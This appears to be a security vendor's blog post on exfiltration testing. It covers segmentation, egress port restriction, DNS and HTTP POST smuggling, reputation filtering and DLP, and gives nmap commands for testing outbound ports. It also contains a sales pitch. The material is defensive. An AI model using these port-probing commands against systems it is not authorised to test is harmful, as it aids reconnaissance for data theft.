Exfiltration Testing and How to Do It

Exfiltration testing is the process where you simulate a malicious actor taking sensitive data from your environment and see what controls are in place to stop or detect it. Many organizations do a pen test and either skip the internal testing entirely or only focus on the vulnerabilities that lie on the devices and not the boundaries between environments. Often such testing is reserved for red team exercises and those are usually not done, except by the most mature cybersecurity postured companies.

This opens a large hole for those companies that cannot afford more than one simple pen test a year or by those who don’t even get a test. This can make companies that store sensitive data like health care (PHI), credit card (PCI), or other personally identifiable information (PII). Once a breach occurs, it can be costly with the US Department of Health and Human Services (HHS) estimating that the cost of each single PHI record stolen is over $400. This value can cause a small company to go bankrupt quickly and shows that proactive testing costs pale in comparison to those of a breach.

Exfiltration testing fits into this preventative model by ensuring it is as difficult as possible to steal data, and when it does occur, the alarms are signaled and it is stopped before too much is lost. The basic way to start this is to isolate all systems with sensitive data into a single area (VLAN or other network boundaries work) and give those systems the best tools. All data exfiltration has to interact with the file system, so a strong endpoint protection solution that utilizes behavior anomaly detection can ensure that odd or unusual actions are caught. Next is to reduce who can access those systems and what permissions they have. From there reduce both the inbound AND outbound ports to the bare minimum. The latter is often overlooked, and even when it is reduced to a good whitelist, doesn’t take into account the things hackers will do to steal your data.

DNS and HTTP POST request smuggling are two methods where protections often ignore, as many admins figure there’s no harm in opening port 53, 80 or 443 to all systems. The recommendation here is to only have the internal DNS servers be allowed to go outbound over port 53, and for ports 80/443 and the other web ports is to be restricted to only those systems that need internet access. Once that has been done, a firewall provider that does IP/URL reputation and age checks adds another layer of security. Often attackers rotate their Command and Control (C2) servers frequently, so the URLs are never more than a month old, some lasting only a few days. Finally a strong DLP solution that does pattern recognition and checks email contents is the last line of defense. This is especially important when a user has a business email compromise (BEC) and handles sensitive data, thereby preventing an attacker from just emailing their data.

An easy way to check for a few of these things are to:

  • Sites like DLP Test offer free sample data and servers to conduct your own test of your DLP provider.

  • Use NMAP to check open ports. From the internal machine, run the command “nmap -p- egadz.metasploit.com” or “nmap -p- letmeoutofyour.net”. The results are all open ports that can be reached.

  • Ask your pen testing provider, MSSP, or IT service provider to check that all sensitive data areas are secure. Additionally, a data leakage test can help, where the testers look for data on servers or systems that should not have sensitive data on them. This is often the case when systems are repurposed or legacy.

Knowing where your data lies is important, and knowing where it’s going is even more so. Tools like Glassportal help you understand the risk each environment has, so your sensitive data warehouses can be better protected, contact us to find out more: demo@glassportal.io.

Previous
Previous

Multifactor: Why You Need It and Why It’s Not Enough

Next
Next

Business Logic Flaws: Why they Matter